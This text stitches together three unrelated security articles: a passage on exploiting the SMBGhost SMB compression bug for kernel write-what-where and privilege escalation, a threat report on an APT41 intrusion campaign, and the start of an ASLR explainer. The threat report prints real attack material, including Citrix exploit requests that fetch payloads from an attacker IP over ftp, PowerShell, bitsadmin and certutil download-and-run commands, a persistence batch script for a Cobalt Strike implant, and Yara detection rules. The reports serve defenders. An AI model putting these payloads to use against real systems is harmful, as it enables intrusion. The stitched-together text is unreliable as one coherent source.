Lookaside lists are used for effectively reserving a set of reusable, fixed-size buffers for the driver. One of the capabilities of lookaside lists is to define a custom allocation/free functions which will be used for managing the buffers. Looking at references for the SrvNetBufferLookasides array, we found that it’s initialized in the SrvNetCreateBufferLookasides function, and by looking at it we learned the following:

  • The custom allocation function is defined as SrvNetBufferLookasideAllocate, which just calls SrvNetAllocateBufferFromPool.
  • 9 lookaside lists are created with the following sizes, as we quickly calculated with Python:
    >>> [hex((1 << (i + 12)) + 256) for i in range(9)]
    [‘0x1100’, ‘0x2100’, ‘0x4100’, ‘0x8100’, ‘0x10100’, ‘0x20100’, ‘0x40100’, ‘0x80100’, ‘0x100100’]

    It matches our finding that allocations larger than 0x100100 bytes are allocated without using lookaside lists.

The conclusion is that every allocation request ends up in the SrvNetAllocateBufferFromPool function, so let’s take a look at it.

SrvNetAllocateBufferFromPool and the allocated buffer layout

The SrvNetAllocateBufferFromPool function allocates a buffer in the NonPagedPoolNx pool using the ExAllocatePoolWithTag function, and then fills some of the structures with data. The layout of the allocated buffer is the following:

The only relevant parts of this layout for the scope of our research are the user buffer and the ALLOCATION_HEADER struct. We can see right away that by overflowing the user buffer, we end up overriding the ALLOCATION_HEADER struct. Looks very convenient.

Overriding the ALLOCATION_HEADER struct

Our first thought at this point was that due to the check that follows the SmbCompressionDecompress call:

if (Status < 0 || FinalCompressedSize != Header->OriginalCompressedSegmentSize) {
    SrvNetFreeBuffer(Alloc);
    return STATUS_BAD_DATA;
}

SrvNetFreeBuffer will be called and the function will fail, since we crafted OriginalCompressedSegmentSize to be a huge number, and FinalCompressedSize is going to be a smaller number which represents the actual amount of decompressed bytes. So we analyzed the SrvNetFreeBuffer function, managed to replace the allocation pointer to a magic number, and waited for the free function to try and free it, hoping to leverage it later for use-after-free or similar. But to our surprise, we got a crash in the memcpy function. That has made us happy, since we didn’t hope to get there at all, but we had to check why it happened. The explanation can be found in the implementation of the SmbCompressionDecompress function:

NTSTATUS SmbCompressionDecompress(
    USHORT CompressionAlgorithm,
    PUCHAR UncompressedBuffer,
    ULONG  UncompressedBufferSize,
    PUCHAR CompressedBuffer,
    ULONG  CompressedBufferSize,
    PULONG FinalCompressedSize)
{
    // ...

    NTSTATUS Status = RtlDecompressBufferEx2(
        ...,
        FinalUncompressedSize,
        ...);
    if (Status >= 0) {
        *FinalCompressedSize = CompressedBufferSize;
    }

    // ...

    return Status;
}

Basically, if the decompression succeeds, FinalCompressedSize is updated to hold the value of CompressedBufferSize, which is the size of the buffer. This deliberate update of the FinalCompressedSize return value seemed quite suspicious for us, since this little detail, together with the allocated buffer layout, allows for a very convenient exploitation of this bug.

Since the execution continues to the stage of copying the raw data, let’s review the call once again:

memcpy(
    Alloc->UserBuffer,
    (PUCHAR)Header + sizeof(COMPRESSION_TRANSFORM_HEADER),
    Header->Offset);

The target address is read from the ALLOCATION_HEADER struct, the one that we can override. The content and the size of the buffer are controlled by us as well. Jackpot! Write-what-where in the kernel, remotely!

Remote write-what-where implementation

We did a quick implementation of a Write-What-Where CVE-2020-0796 Exploit in Python, which is based on the CVE-2020-0796 DoS POC of maxpl0it. The code is fairly short and straightforward.

Local Privilege Escalation

Now that we have the write-what-where exploit, what can we do with it? Obviously we can crash the system. We might be able to trigger remote code execution, but we didn’t find a way to do that yet. If we use the exploit on localhost and leak additional information, we can use it for local privilege escalation, as it was already demonstrated to be possible via several techniques.

The first technique we tried was proposed by Morten Schenk in his Black Hat USA 2017 talk. The technique involves overriding a function pointer in the .data section of the win32kbase.sys driver, and then calling the appropriate function from user mode to gain code execution. j00ru wrote a great writeup about using this technique in WCTF 2018, and provided his exploit source code. We adjusted it for our write-what-where exploit, but found out that it doesn’t work since the thread that handles the SMB messages is not a GUI thread. Due to this, win32kbase.sys is not mapped, and the technique is not relevant (unless there’s a way to make it a GUI thread, something we didn’t research).

We ended up using the well known technique covered by cesarcer in 2012 in his Black Hat presentation Easy Local Windows Kernel Exploitation. The technique is about leaking the current process token address by using the NtQuerySystemInformation(SystemHandleInformation) API, and then overriding it, granting the current process token privileges that can then be used for privilege escalation. The Abusing Token Privileges For EoP research by Bryan Alexander (dronesec) and Stephen Breen (breenmachine) (2017) demonstrates several ways of using various token privileges for privilege escalation.

We based our exploit on the code that Alexandre Beaulieu kindly shared in his Exploiting an Arbitrary Write to Escalate Privileges writeup. We completed the privilege escalation after modifying our process’ token privileges by injecting a DLL into winlogon.exe. The DLL’s whole purpose is to launch a privileged instance of cmd.exe. Our complete Local Privilege Escalation Proof of Concept can be found here and is available for research / defensive purposes only.

Summary

We managed to demonstrate that the CVE-2020-0796 vulnerability can be exploited for local privilege escalation. Note that our exploit is limited for medium integrity level, since it relies on API calls that are unavailable in a lower integrity level. Can we do more than that? Maybe, but it will require more research. There are many other fields that we can override in the allocated buffer, perhaps one of them can help us achieve other interesting things such as remote code execution.

POC Source Code

Remediation

  1. We recommend updating servers and endpoints to the latest Windows version to remediate this vulnerability. If possible, block port 445 until updates are deployed. Regardless of CVE-2020-0796, we recommend enabling host-isolation where possible.
  2. It is possible to disable SMBv3.1.1 compression in order to avoid triggers to this bug, however we recommend to do full update instead if possible.

ZecOps Customers & Partners

ZecOps Digital Forensics and Incident Response (DFIR) customers can detect such exploitation attempts as “CVE-2020-0796” using ZecOps agentless solution: Neutrino for Servers and Endpoints. To try ZecOps technology and see a demo, you can contact us here

Researchers wanted

At ZecOps we’re working on offensive cyber security research for defensive purposes. We are hiring additional researchers & exploit developers in various platforms including iOS and Windows. If you are interested, contact us here.

Hear the news first

  • Only essential content
  • New vulnerabilities & announcements
  • News from ZecOps Research Team
We won’t spam, pinky swear 🤞

This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits

Beginning this year, FireEye observed Chinese actor APT41 carry out one of the broadest campaigns by a Chinese cyber espionage actor we have observed in recent years. Between January 20 and March 11, FireEye observed APT41 attempt to exploit vulnerabilities in Citrix NetScaler/ADC, Cisco routers, and Zoho ManageEngine Desktop Central at over 75 FireEye customers. Countries we’ve seen targeted include Australia, Canada, Denmark, Finland, France, India, Italy, Japan, Malaysia, Mexico, Philippines, Poland, Qatar, Saudi Arabia, Singapore, Sweden, Switzerland, UAE, UK and USA. The following industries were targeted: Banking/Finance, Construction, Defense Industrial Base, Government, Healthcare, High Technology, Higher Education, Legal, Manufacturing, Media, Non-profit, Oil & Gas, Petrochemical, Pharmaceutical, Real Estate, Telecommunications, Transportation, Travel, and Utility. It’s unclear if APT41 scanned the Internet and attempted exploitation en masse or selected a subset of specific organizations to target, but the victims appear to be more targeted in nature.

Exploitation of CVE-2019-19781 (Citrix Application Delivery Controller [ADC])

Starting on January 20, 2020, APT41 used the IP address 66.42.98[.]220 to attempt exploits of Citrix Application Delivery Controller (ADC) and Citrix Gateway devices with CVE-2019-19781 (published December 17, 2019).


Figure 1: Timeline of key events

The initial CVE-2019-19781 exploitation activity on January 20 and January 21, 2020, involved execution of the command ‘file /bin/pwd’, which may have achieved two objectives for APT41. First, it would confirm whether the system was vulnerable and the mitigation wasn’t applied. Second, it may return architecture-related information that would be required knowledge for APT41 to successfully deploy a backdoor in a follow-up step.  

One interesting thing to note is that all observed requests were only performed against Citrix devices, suggesting APT41 was operating with an already-known list of identified devices accessible on the internet.

POST /vpns/portal/scripts/newbm.pl HTTP/1.1
Host: [redacted]
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.22.0
NSC_NONCE: nsroot
NSC_USER: ../../../netscaler/portal/templates/[redacted]
Content-Length: 96

url=http://example.com&title=[redacted]&desc=[% template.new('BLOCK' = 'print `file /bin/pwd`') %]

Figure 2: Example APT41 HTTP traffic exploiting CVE-2019-19781

There is a lull in APT41 activity between January 23 and February 1, which is likely related to the Chinese Lunar New Year holidays which occurred between January 24 and January 30, 2020. This has been a common activity pattern by Chinese APT groups in past years as well.

Starting on February 1, 2020, APT41 moved to using CVE-2019-19781 exploit payloads that initiate a download via the File Transfer Protocol (FTP). Specifically, APT41 executed the command ‘/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220/bsd’, which connected to 66.42.98[.]220 over the FTP protocol, logged in to the FTP server with a username of ‘test’ and a password that we have redacted, and then downloaded an unknown payload named ‘bsd’ (which was likely a backdoor).

POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
Accept-Encoding: identity
Content-Length: 147
Connection: close
Nsc_User: ../../../netscaler/portal/templates/[redacted]
User-Agent: Python-urllib/2.7
Nsc_Nonce: nsroot
Host: [redacted]
Content-Type: application/x-www-form-urlencoded

url=http://example.com&title=[redacted]&desc=[% template.new('BLOCK' = 'print `/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220/bsd`') %]

Figure 3: Example APT41 HTTP traffic exploiting CVE-2019-19781

We did not observe APT41 activity at FireEye customers between February 2 and February 19, 2020. China initiated COVID-19 related quarantines in cities in Hubei province starting on January 23 and January 24, and rolled out quarantines to additional provinces starting between February 2 and February 10. While it is possible that this reduction in activity might be related to the COVID-19 quarantine measures in China, APT41 may have remained active in other ways, which we were unable to observe with FireEye telemetry. We observed a significant uptick in CVE-2019-19781 exploitation on February 24 and February 25. The exploit behavior was almost identical to the activity on February 1, where only the name of the payload ‘un’ changed.

POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
Accept-Encoding: identity
Content-Length: 145
Connection: close
Nsc_User: ../../../netscaler/portal/templates/[redacted]
User-Agent: Python-urllib/2.7
Nsc_Nonce: nsroot
Host: [redacted]
Content-Type: application/x-www-form-urlencoded

url=http://example.com&title= [redacted]&desc=[% template.new('BLOCK' = 'print `/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\@66.42.98[.]220/un`') %]

Figure 4: Example APT41 HTTP traffic exploiting CVE-2019-19781

Citrix released a mitigation for CVE-2019-19781 on December 17, 2019, and as of January 24, 2020, released permanent fixes for all supported versions of Citrix ADC, Gateway, and SD-WAN WANOP.

Cisco Router Exploitation

On February 21, 2020, APT41 successfully exploited a Cisco RV320 router at a telecommunications organization and downloaded a 32-bit ELF binary payload compiled for a 64-bit MIPS processor named ‘fuc’ (MD5: 155e98e5ca8d662fad7dc84187340cbc). It is unknown what specific exploit was used, but there is a Metasploit module that combines two CVE’s (CVE-2019-1653 and CVE-2019-1652) to enable remote code execution on Cisco RV320 and RV325 small business routers and uses wget to download the specified payload.

GET /test/fuc
HTTP/1.1
Host: 66.42.98\.220
User-Agent: Wget
Connection: close

Figure 5: Example HTTP request showing Cisco RV320 router downloading a payload via wget

66.42.98[.]220 also hosted a file name http://66.42.98[.]220/test/1.txt. The content of 1.txt (MD5:  c0c467c8e9b2046d7053642cc9bdd57d) is ‘cat /etc/flash/etc/nk_sysconfig’, which is the command one would execute on a Cisco RV320 router to display the current configuration.

Cisco PSIRT confirmed that fixed software to address the noted vulnerabilities is available and asks customers to review the following security advisories and take appropriate action:

Exploitation of CVE-2020-10189 (Zoho ManageEngine Zero-Day Vulnerability)

On March 5, 2020, researcher Steven Seeley, published an advisory and released proof-of-concept code for a zero-day remote code execution vulnerability in Zoho ManageEngine Desktop Central versions prior to 10.0.474 (CVE-2020-10189). Beginning on March 8, FireEye observed APT41 use 91.208.184[.]78 to attempt to exploit the Zoho ManageEngine vulnerability at more than a dozen FireEye customers, which resulted in the compromise of at least five separate customers. FireEye observed two separate variations of how the payloads (install.bat and storesyncsvc.dll) were deployed. In the first variation the CVE-2020-10189 exploit was used to directly upload “logger.zip”, a simple Java based program, which contained a set of commands to use PowerShell to download and execute install.bat and storesyncsvc.dll.

java/lang/Runtime

getRuntime

()Ljava/lang/Runtime;

Xcmd /c powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/test/install.bat','C:\
Windows\Temp\install.bat')&powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/test/storesyncsvc.dll','
C:\Windows\Temp\storesyncsvc.dll')&C:\Windows\Temp\install.bat

'(Ljava/lang/String;)Ljava/lang/Process;

StackMapTable

ysoserial/Pwner76328858520609

Lysoserial/Pwner76328858520609;

Figure 6: Contents of logger.zip

Here we see a toolmark from the tool ysoserial that was used to create the payload in the POC. The string Pwner76328858520609 is unique to the POC payload, indicating that APT41 likely used the POC as source material in their operation.

In the second variation, FireEye observed APT41 leverage the Microsoft BITSAdmin command-line tool to download install.bat (MD5: 7966c2c546b71e800397a67f942858d0) from known APT41 infrastructure 66.42.98[.]220 on port 12345.

Parent Process: C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe

Process Arguments: cmd /c bitsadmin /transfer bbbb http://66.42.98[.]220:12345/test/install.bat C:\Users\Public\install.bat

Figure 7: Example FireEye Endpoint Security event depicting successful CVE-2020-10189 exploitation

In both variations, the install.bat batch file was used to install persistence for a trial-version of Cobalt Strike BEACON loader named storesyncsvc.dll (MD5: 5909983db4d9023e4098e56361c96a6f).

@echo off

set "WORK_DIR=C:\Windows\System32"

set "DLL_NAME=storesyncsvc.dll"

set "SERVICE_NAME=StorSyncSvc"

set "DISPLAY_NAME=Storage Sync Service"

set "DESCRIPTION=The Storage Sync Service is the top-level resource for File Sync. It creates sync relationships with multiple storage accounts via multiple sync groups. If this service is stopped or disabled, applications will be unable to run collectly."

 sc stop %SERVICE_NAME%

sc delete %SERVICE_NAME%

mkdir %WORK_DIR%

copy "%~dp0%DLL_NAME%" "%WORK_DIR%" /Y

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v "%SERVICE_NAME%" /t REG_MULTI_SZ /d "%SERVICE_NAME%" /f

sc create "%SERVICE_NAME%" binPath= "%SystemRoot%\system32\svchost.exe -k %SERVICE_NAME%" type= share start= auto error= ignore DisplayName= "%DISPLAY_NAME%"

SC failure "%SERVICE_NAME%" reset= 86400 actions= restart/60000/restart/60000/restart/60000

sc description "%SERVICE_NAME%" "%DESCRIPTION%"

reg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /f

reg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /v "ServiceDll" /t REG_EXPAND_SZ /d "%WORK_DIR%\%DLL_NAME%" /f

net start "%SERVICE_NAME%"

Figure 8: Contents of install.bat

Storesyncsvc.dll was a Cobalt Strike BEACON implant (trial-version) which connected to exchange.dumb1[.]com (with a DNS resolution of 74.82.201[.]8) using a jquery malleable command and control (C2) profile.

GET /jquery-3.3.1.min.js HTTP/1.1
Host: cdn.bootcss.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://cdn.bootcss.com/
Accept-Encoding: gzip, deflate
Cookie: __cfduid=CdkIb8kXFOR_9Mn48DQwhIEuIEgn2VGDa_XZK_xAN47OjPNRMpJawYvnAhPJYM
DA8y_rXEJQGZ6Xlkp_wCoqnImD-bj4DqdTNbj87Rl1kIvZbefE3nmNunlyMJZTrDZfu4EV6oxB8yKMJfLXydC5YF9OeZwqBSs3Tun12BVFWLI
User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Connection: Keep-Alive Cache-Control: no-cache

Figure 9: Example APT41 Cobalt Strike BEACON jquery malleable C2 profile HTTP request

Within a few hours of initial exploitation, APT41 used the storescyncsvc.dll BEACON backdoor to download a secondary backdoor with a different C2 address that uses Microsoft CertUtil, a common TTP that we’ve observed APT41 use in past intrusions, which they then used to download 2.exe (MD5: 3e856162c36b532925c8226b4ed3481c). The file 2.exe was a VMProtected Meterpreter downloader used to download Cobalt Strike BEACON shellcode. The usage of VMProtected binaries is another very common TTP that we’ve observed this group leverage in multiple intrusions in order to delay analysis of other tools in their toolkit.

GET /2.exe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.3
Host: 91.208.184[.]78

Figure 10: Example HTTP request downloading ‘2.exe’ VMProtected Meterpreter downloader via CertUtil

certutil  -urlcache -split -f http://91.208.184[.]78/2.exe

Figure 11: Example CertUtil command to download ‘2.exe’ VMProtected Meterpreter downloader

The Meterpreter downloader ‘TzGG’ was configured to communicate with 91.208.184[.]78 over port 443 to download the shellcode (MD5: 659bd19b562059f3f0cc978e15624fd9) for Cobalt Strike BEACON (trial-version).

GET /TzGG HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)
Host: 91.208.184[.]78:443
Connection: Keep-Alive
Cache-Control: no-cache

Figure 12: Example HTTP request downloading ‘TzGG’ shellcode for Cobalt Strike BEACON

The downloaded BEACON shellcode connected to the same C2 server: 91.208.184[.]78. We believe this is an example of the actor attempting to diversify post-exploitation access to the compromised systems.

ManageEngine released a short term mitigation for CVE-2020-10189 on January 20, 2020, and subsequently released an update on March 7, 2020, with a long term fix.

Outlook

This activity is one of the most widespread campaigns we have seen from China-nexus espionage actors in recent years. While APT41 has previously conducted activity with an extensive initial entry such as the trojanizing of NetSarang software, this scanning and exploitation has focused on a subset of our customers, and seems to reveal a high operational tempo and wide collection requirements for APT41.

It is notable that we have only seen these exploitation attempts leverage publicly available malware such as Cobalt Strike and Meterpreter. While these backdoors are full featured, in previous incidents APT41 has waited to deploy more advanced malware until they have fully understood where they were and carried out some initial reconnaissance. In 2020, APT41 continues to be one of the most prolific threats that FireEye currently tracks. This new activity from this group shows how resourceful and how quickly they can leverage newly disclosed vulnerabilities to their advantage.

Previously, FireEye Mandiant Managed Defense identified APT41 successfully leverage CVE-2019-3396 (Atlassian Confluence) against a U.S. based university. While APT41 is a unique state-sponsored Chinese threat group that conducts espionage, the actor also conducts financially motivated activity for personal gain.

Indicators

Type

Indicator(s)

CVE-2019-19781 Exploitation (Citrix Application Delivery Control)

66.42.98[.]220

CVE-2019-19781 exploitation attempts with a payload of ‘file /bin/pwd’

CVE-2019-19781 exploitation attempts with a payload of ‘/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\@66.42.98[.]220/bsd’

CVE-2019-19781 exploitation attempts with a payload of ‘/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\@66.42.98[.]220/un’

/tmp/bsd

/tmp/un

Cisco Router Exploitation

66.42.98\.220

‘1.txt’ (MD5:  c0c467c8e9b2046d7053642cc9bdd57d)

‘fuc’ (MD5: 155e98e5ca8d662fad7dc84187340cbc

CVE-2020-10189 (Zoho ManageEngine Desktop Central)

66.42.98[.]220

91.208.184[.]78

74.82.201[.]8

exchange.dumb1[.]com

install.bat (MD5: 7966c2c546b71e800397a67f942858d0)

storesyncsvc.dll (MD5: 5909983db4d9023e4098e56361c96a6f)

C:\Windows\Temp\storesyncsvc.dll

C:\Windows\Temp\install.bat

2.exe (MD5: 3e856162c36b532925c8226b4ed3481c)

C:\Users\[redacted]\install.bat

TzGG (MD5: 659bd19b562059f3f0cc978e15624fd9)

C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe spawning cmd.exe and/or bitsadmin.exe

Certutil.exe downloading 2.exe and/or payloads from 91.208.184[.]78

PowerShell downloading files with Net.WebClient

Detecting the Techniques

FireEye detects this activity across our platforms. This table contains several specific detection names from a larger list of detections that were available prior to this activity occurring.

Platform

Signature Name

Endpoint Security

 

BITSADMIN.EXE MULTISTAGE DOWNLOADER (METHODOLOGY)

CERTUTIL.EXE DOWNLOADER A (UTILITY)

Generic.mg.5909983db4d9023e

Generic.mg.3e856162c36b5329

POWERSHELL DOWNLOADER (METHODOLOGY)

SUSPICIOUS BITSADMIN USAGE B (METHODOLOGY)

SAMWELL (BACKDOOR)

SUSPICIOUS CODE EXECUTION FROM ZOHO MANAGE ENGINE (EXPLOIT)

Network Security

Backdoor.Meterpreter

DTI.Callback

Exploit.CitrixNetScaler

Trojan.METASTAGE

Exploit.ZohoManageEngine.CVE-2020-10198.Pwner

Exploit.ZohoManageEngine.CVE-2020-10198.mdmLogUploader

Helix

CITRIX ADC [Suspicious Commands]
 EXPLOIT - CITRIX ADC [CVE-2019-19781 Exploit Attempt]
 EXPLOIT - CITRIX ADC [CVE-2019-19781 Exploit Success]
 EXPLOIT - CITRIX ADC [CVE-2019-19781 Payload Access]
 EXPLOIT - CITRIX ADC [CVE-2019-19781 Scanning]
 MALWARE METHODOLOGY [Certutil User-Agent]
 WINDOWS METHODOLOGY [BITSadmin Transfer]
 WINDOWS METHODOLOGY [Certutil Downloader]

MITRE ATT&CK Technique Mapping

ATT&CK

Techniques

Initial Access

External Remote Services (T1133), Exploit Public-Facing Application (T1190)

Execution

PowerShell (T1086), Scripting (T1064)

Persistence

New Service (T1050)

 

Privilege Escalation

Exploitation for Privilege Escalation (T1068)

 

Defense Evasion

BITS Jobs (T1197), Process Injection (T1055)

 

 

Command And Control

Remote File Copy (T1105), Commonly Used Port (T1436), Uncommonly Used Port (T1065), Custom Command and Control Protocol (T1094), Data Encoding (T1132), Standard Application Layer Protocol (T1071)

Appendix A: Discovery Rules

The following Yara rules serve as examples of discovery rules for APT41 actor TTPs, turning the adversary methods or tradecraft into new haystacks for purposes of detection or hunting. For all tradecraft-based discovery rules, we recommend deliberate testing and tuning prior to implementation in any production system. Some of these rules are tailored to build concise haystacks that are easy to review for high-fidelity detections. Some of these rules are broad in aperture that build larger haystacks for further automation or processing in threat hunting systems.

import "pe"

rule ExportEngine_APT41_Loader_String

{

            meta:

                        author = "@stvemillertime"

                        description "This looks for a common APT41 Export DLL name in BEACON shellcode loaders, such as loader_X86_svchost.dll"

            strings:

                        $pcre = /loader_[\x00-\x7F]{1,}\x00/

            condition:

                        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))

}

rule ExportEngine_ShortName

{

    meta:

        author = "@stvemillertime"

        description = "This looks for Win PEs where Export DLL name is a single character"

    strings:

        $pcre = /[A-Za-z0-9]{1}\.(dll|exe|dat|bin|sys)/

    condition:

        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))

}

rule ExportEngine_xArch

{

    meta:

        author = "@stvemillertime"

        description = "This looks for Win PEs where Export DLL name is a something like x32.dat"

            strings:

             $pcre = /[\x00-\x7F]{1,}x(32|64|86)\.dat\x00/

            condition:

             uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))

}

rule RareEquities_LibTomCrypt

{

    meta:

        author = "@stvemillertime"

        description = "This looks for executables with strings from LibTomCrypt as seen by some APT41-esque actors https://github.com/libtom/libtomcrypt - might catch everything BEACON as well. You may want to exclude Golang and UPX packed samples."

    strings:

        $a1 = "LibTomMath"

    condition:

        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $a1

}

rule RareEquities_KCP

{

    meta:

        author = "@stvemillertime"

        description = "This is a wide catchall rule looking for executables with equities for a transport library called KCP, https://github.com/skywind3000/kcp Matches on this rule may have built-in KCP transport ability."

    strings:

        $a01 = "[RO] %ld bytes"

        $a02 = "recv sn=%lu"

        $a03 = "[RI] %d bytes"

        $a04 = "input ack: sn=%lu rtt=%ld rto=%ld"

        $a05 = "input psh: sn=%lu ts=%lu"

        $a06 = "input probe"

        $a07 = "input wins: %lu"

        $a08 = "rcv_nxt=%lu\\n"

        $a09 = "snd(buf=%d, queue=%d)\\n"

        $a10 = "rcv(buf=%d, queue=%d)\\n"

        $a11 = "rcvbuf"

    condition:

        (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 5MB and 3 of ($a*)

}

rule ConventionEngine_Term_Users

{

            meta:

                        author = "@stvemillertime"

                        description = "Searching for PE files with PDB path keywords, terms or anomalies."

                        sample_md5 = "09e4e6fa85b802c46bc121fcaecc5666"

                        ref_blog = "https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html"

            strings:

                        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}Users[\x00-\xFF]{0,200}\.pdb\x00/ nocase ascii

            condition:

                        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pcre

}

rule ConventionEngine_Term_Desktop

{

            meta:

                        author = "@stvemillertime"

                        description = "Searching for PE files with PDB path keywords, terms or anomalies."

                        sample_md5 = "71cdba3859ca8bd03c1e996a790c04f9"

                        ref_blog = "https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html"

            strings:

                        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}Desktop[\x00-\xFF]{0,200}\.pdb\x00/ nocase ascii

            condition:

                        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pcre

}

rule ConventionEngine_Anomaly_MultiPDB_Double

{

            meta:

                        author = "@stvemillertime"

                        description = "Searching for PE files with PDB path keywords, terms or anomalies."

                        sample_md5 = "013f3bde3f1022b6cf3f2e541d19353c"

                        ref_blog = "https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html"

            strings:

                        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}\.pdb\x00/

            condition:

                        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and #pcre == 2

}

Six Facts about Address Space Layout Randomization on Windows

Overcoming address space layout randomization (ASLR) is a precondition of virtually all modern memory corruption vulnerabilities. Breaking ASLR is an area of active research and can get incredibly complicated. This blog post presents some basic facts about ASLR, focusing on the Windows implementation. In addition to covering what ASLR accomplishes to improve security posture, we aim to give defenders advice on how to improve the security of their software, and to give researchers more insight into how ASLR works and ideas for investigating its limitations.

Memory corruption vulnerabilities occur when a program mistakenly writes attacker-controlled data outside of an intended memory region or outside intended memory’s scope. This may crash the program, or worse, provide the attacker full control over the system. Memory corruption vulnerabilities have plagued software for decades, despite efforts by large companies like Apple, Google, and Microsoft to eradicate them.

Since these bugs are hard to find and just one can compromise a system, security professionals have designed failsafe mechanisms to thwart software exploitation and limit the damage should a memory corruption bug be exploited. A “silver bullet” would be a mechanism to make exploits so tricky and unreliable that buggy code can be left in place, giving developers the years they need to fix or rewrite code in memory-safe languages. Unfortunately, nothing is perfect, but address space layout randomization (ASLR) is one of the best mitigations available.

ASLR works by breaking assumptions that developers could otherwise make about where programs and libraries would lie in memory at runtime. A common example is the locations of gadgets used in return-oriented programming (ROP), which is often used to defeat the defense of data execution prevention (DEP). ASLR mixes up the address space of the vulnerable process—the main program, its dynamic libraries, the stack and heap, memory-mapped files, and so on—so that exploit payloads must be uniquely tailored to however the address space of the victim process is laid out at the time. Writing a worm that propagates by blindly sending a memory corruption exploit with hard-coded memory addresses to every machine it can find is bound to fail. So long as the target process has ASLR enabled, the exploit’s memory offsets will be different than what ASLR has selected. This crashes the vulnerable program rather than exploiting it.

Fact 1: ASLR was introduced in Windows Vista. Pre-Vista versions of Windows lacked ASLR; worse, they went to great lengths to maintain a consistent address space across all processes and machines.

Windows Vista and Windows Server 2008 were the first releases to feature support for ASLR for compatible executables and libraries. One might assume that prior versions simply didn’t randomize the address space, and instead simply loaded DLLs at whatever location was convenient at the time—perhaps a predictable one, but not necessarily the same between two processes or machines. Unfortunately, these old Windows versions instead went out of their way to achieve what we’ll call “Address Space Layout Consistency”. Table 1 shows the “preferred base address” of some core DLLs of Windows XP Service Pack 3.

DLL

Preferred Base Address

ntdll

0x7c900000

kernel32

0x7c800000

user32

0x7e410000

gdi32

0x77f10000

Table 1: Windows DLLs contain a preferred base address used whenever possible if ASLR is not in place

When creating a process, pre-Vista Windows loads each of the program’s needed DLLs at its preferred base address if possible. If an attacker finds a useful ROP gadget in ntdll at 0x7c90beef, for example, the attacker can assume that it will always be available at that address until a future service pack or security patch requires the DLLs to be reorganized. This means that attacks on pre-Vista Windows can chain together ROP gadgets from common DLLs to disable DEP, the lone memory corruption defense on those releases.

Why did Windows need to support preferred base addresses? The answer lies in performance and in trade-offs made in the design of Windows DLLs versus other designs like ELF shared libraries. Windows DLLs are not position independent. Especially on 32-bit machines, if Windows DLL code needs to reference a global variable, the runtime address of that variable gets hardcoded into the machine code. If the DLL gets loaded at a different address than was expected, relocation is performed to fix up such hardcoded references. If the DLL instead gets loaded as its preferred base address, no relocation is necessary, and the DLL’s code can be directly mapped into memory from the file system.

Directly mapping the DLL file into memory is a small performance benefit since it avoids reading any of the DLL’s pages into physical memory until they are needed. A better reason for preferred base addresses is to ensure that only one copy of a DLL needs to be in memory. Without them, if three programs run that share a common DLL, but each loads that DLL at a different address, there would be three DLL copies in memory, each relocated to a different base. That would counteract a main benefit of using shared libraries in the first place. Aside from its security benefits, ASLR accomplishes the same thing—ensuring that the address spaces of loaded DLLs won’t overlap and loading only a single copy of a DLL into memory—in a more elegant way. Because ASLR does a better job of avoiding overlap between address spaces than statically-assigned preferred load addresses ever could, manually assigning preferred base addresses provides no optimization on an ASLR-capable OS, and is not needed any longer in the development lifecycle.

Takeaway 1.1: Windows XP and Windows Server 2003 and earlier do not support ASLR.

